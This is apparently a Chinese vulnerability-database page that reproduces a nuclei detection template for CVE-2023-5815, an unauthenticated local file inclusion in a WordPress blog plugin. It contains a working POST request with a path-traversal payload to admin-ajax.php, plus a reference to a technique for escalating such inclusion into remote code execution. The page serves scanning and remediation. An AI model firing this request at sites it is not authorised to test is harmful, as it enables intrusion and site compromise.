CVE-2023-5815: News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion

日期: 2025-12-02 | 影响软件: News & Blog Designer Pack WordPress Blog Plugin | POC: 已公开

漏洞描述

The News & Blog Designer Pack WordPress plugin up to version 3.4.1 contains a remote code execution caused by local file inclusion in the bdp_get_more_post function, letting unauthenticated attackers include arbitrary PHP files, exploit requires AJAX request with crafted POST data.

PoC代码[已公开]

id: CVE-2023-5815

info:
  name: News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion
  author: daffainfo
  severity: high
  description: |
    The News & Blog Designer Pack WordPress plugin up to version 3.4.1 contains a remote code execution caused by local file inclusion in the bdp_get_more_post function, letting unauthenticated attackers include arbitrary PHP files, exploit requires AJAX request with crafted POST data.
  impact: |
    Attackers can include arbitrary PHP files, leading to remote code execution and full site compromise.
  remediation: |
    Update to the latest version beyond 3.4.1 or disable the vulnerable AJAX functionality.
  reference:
    - https://wordpress.org/plugins/blog-designer-pack/
    - https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-5815
    epss-score: 0.41397
    epss-percentile: 0.9725
    cpe: cpe:2.3:a:infornweb:news_\&_blog_designer_pack:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: infornweb
    product: news_\&_blog_designer_pack
    framework: wordpress
    publicwww-query: "/wp-content/plugins/blog-designer-pack/"
  tags: cve,cve2023,wordpress,wp,wp-plugin,blog-designer-pack,lfi,vkev

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=bdp_get_more_post&shrt_param[design]=../../../../../wp-login

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success"'
          - '"data"'
          - 'wp-login'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 490a00463044022037392bf388c476d34ff87a087b576f0a35a3181569d86ae3ddbddf391fbeda2902205d0ae1d62a74407dc5d102ad38945495e61579b35ea09247c6e23b5e61fdab63:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-5815.yaml

相关漏洞推荐